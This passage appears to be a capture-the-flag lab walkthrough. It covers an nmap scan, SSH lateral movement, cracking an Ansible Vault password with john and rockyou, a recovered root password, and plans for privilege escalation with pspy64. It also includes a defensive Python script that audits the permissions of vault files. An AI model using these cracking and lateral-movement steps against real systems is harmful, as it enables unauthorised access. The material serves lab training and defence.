Command: nmap -A -Pn 192.168.243.173
Nmap initial output
Nmap scan report for 192.168.243.173
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 1f:11:e4:0b:3b:8a:e3:12:e9:44:10:7a:c9:64:98:f3 (RSA)
| 256 8a:f7:59:6b:af:db:14:0a:e8:4f:2a:4d:c9:66:04:e7 (ECDSA)
|_ 256 d7:cf:21:25:eb:d2:7e:1a:b4:6b:77:41:56:bf:c8:c1 (ED25519)
8081/tcp closed blackice-icecap
8082/tcp closed blackice-alerts
Aggressive OS guesses: Linux 3.11 - 4.1 (93%), Linux 4.4 (93%), Linux 3.16 (90%), Linux 3.13 (90%), Linux 3.10 - 3.16 (88%), Linux 3.10 - 3.12 (88%), Linux 2.6.32 (88%), Linux 3.2 - 3.8 (88%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8082/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 192.168.243.172
2 205.18 ms 192.168.243.173
Continuing from 192.168.243.172:
nottodd@cb2:/home/nottodd/.ssh/controlmaster$ ssh marks@cb3
Obtained flag: 087fade67b1acec922746aa2694c704d
Go to the /opt/ansible directory and view the contents of the webserver.yaml file:
Save the content in the red box in the screenshot above and crack the password:
python3 /usr/share/john/ansible2john.py ansible_webserver.txt > ansible2johnhash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ansible2johnhash.txt
Continue decrypting:
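As an added, defender-side example that is not part of the original writeup: a small Python audit that locates Ansible Vault payloads on disk (both inline `!vault |` values inside a playbook and whole-file vaults, including 1.2 headers with a vault-id) and flags files readable by group or others, which is the exposure that let the vault above be copied out and attacked offline with a wordlist. The tree it scans is constructed sample data built in a temp directory, not the lab's files.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Vault header: $ANSIBLE_VAULT;<version>;AES256[;<vault-id>]  (format 1.2 adds the id).
# Inline "!vault |" values inside a playbook are indented, so allow leading space.
VAULT_HEADER = re.compile(
    r"^\s*\$ANSIBLE_VAULT;(?P<version>\d\.\d);(?P<cipher>[A-Z0-9]+)(?:;(?P<vault_id>\S+))?",
    re.MULTILINE,
)

def find_vault_blobs(text):
    """Return one dict (version, cipher, vault_id) per vault header found in text."""
    return [m.groupdict() for m in VAULT_HEADER.finditer(text)]

def audit_vault_files(root):
    """Report each file under root holding a vault payload and whether group/other can
    read it, the exposure that makes offline guessing of the vault password possible."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        blobs = find_vault_blobs(path.read_text(errors="ignore"))
        if blobs:
            exposed = bool(path.stat().st_mode & (stat.S_IRGRP | stat.S_IROTH))
            findings.append({"path": str(path), "blobs": blobs, "readable_by_others": exposed})
    return findings

def build_demo_tree():
    """Create a constructed sample tree (not the lab's files) and return its root."""
    root = Path(tempfile.mkdtemp(prefix="vault_audit_"))
    playbook = root / "webserver.yaml"  # inline vault variable, world-readable: finding
    playbook.write_text("- hosts: web\n  vars:\n    db_pass: !vault |\n"
                        "      $ANSIBLE_VAULT;1.1;AES256\n      6162636465666768696a6b6c\n")
    os.chmod(playbook, 0o644)
    secrets = root / "secrets.yml"  # whole-file vault with a vault-id, owner-only: ok
    secrets.write_text("$ANSIBLE_VAULT;1.2;AES256;prod\n6162636465666768696a6b6c\n")
    os.chmod(secrets, 0o600)
    return str(root)

if __name__ == "__main__":
    for f in audit_vault_files(build_demo_tree()):
        status = "EXPOSED" if f["readable_by_others"] else "ok"
        print(f"{status:8}{f['path']}  versions={[b['version'] for b in f['blobs']]}")
```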
View /etc/ansible/hosts:
Try logging in to 192.168.243.171 over SSH as root with the recovered password lifeintheantfarm.
Attempt privilege escalation on 192.168.243.173: download pspy64 to observe the running processes: